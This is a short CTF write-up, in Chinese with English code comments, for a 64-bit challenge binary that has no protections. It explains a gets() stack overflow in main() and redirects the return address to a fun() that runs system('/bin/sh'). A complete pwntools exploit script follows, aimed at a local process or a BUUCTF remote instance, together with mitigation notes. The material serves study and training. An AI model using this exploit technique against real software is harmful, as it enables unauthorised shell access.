64 位程序，没有开启任何保护
主函数中 gets 函数直接导致栈溢出
/*
 * Decompiler listing of the challenge binary's main().
 * Reads one line from stdin into `s` with gets(), which applies no length
 * bound, then echoes it back with puts(). `s` is a single byte located at
 * [bp-0xF], so any longer line overwrites the stack above it; the script
 * further down uses an offset of 0x0f + 8 bytes to reach the saved return
 * address (0x0f up to the frame base, 8 more past the saved rbp).
 * The page states the binary was built without protections (presumably no
 * stack canary and no PIE), which is why the overwritten return address is
 * used as-is.
 * Mitigation: replace gets() with a bounded read such as
 * fgets(buf, sizeof buf, stdin), and build with stack protector and PIE.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
    char s; // [sp+1h] [bp-Fh]@1  -- 1-byte buffer, 0xF below the frame base
    puts("please input");
    gets(&s, argv); // decompiler artifact: gets() takes one argument; no bound is applied
    puts(&s);
    puts("ok,bye!!!");
    return 0;
}
fun 函数（溢出要跳转到的目标位置）
/*
 * Helper present in the binary that spawns a shell via system().
 * Nothing in the shown main() calls it; the script below redirects the
 * overwritten return address to 0x40118A, presumably this function's
 * address (the page does not show the symbol table, so confirm in the
 * disassembler). From a defender's view this is dead code that turns any
 * control-flow hijack into a shell, and should not ship in a build.
 */
int fun()
{
    return system("/bin/sh");
}
把返回地址溢出到 fun 函数所在的位置就行了
from pwn import *
# Target settings for pwntools: 64-bit Linux so p64() packs 8-byte little-endian
# values; debug log level prints every byte sent and received.
context(os="linux", arch="amd64", log_level="debug")
# 1 = run the local binary, anything else = connect to the remote instance (see main()).
content = 1
def main():
    """Send one oversized line to the program so its return address is replaced.

    Chooses a local process or the remote service from the module-level
    `content` flag, then builds the payload: 0x0f + 8 filler bytes (the
    distance from `s` at [bp-0xF] to the saved return address, the extra 8
    covering the saved rbp) followed by the 8-byte little-endian address
    0x40118A, which the page identifies as the location to overflow into.
    Relies on the binary having no stack canary or PIE, as stated on the page.
    """
    if content == 1:
        peiqi = process("pwn1")  # local binary in the current directory
    else:
        peiqi = remote("node3.buuoj.cn",28330)  # remote challenge instance
    payload = b'a' * (0x0f + 8)  # filler up to the saved return address
    payload = payload + p64(0x40118A)  # overwrite the return address (8 bytes, little-endian)
    peiqi.sendline(payload)
    peiqi.interactive()  # hand the connection over to the user
main()  # runs unconditionally on execution; there is no __main__ guard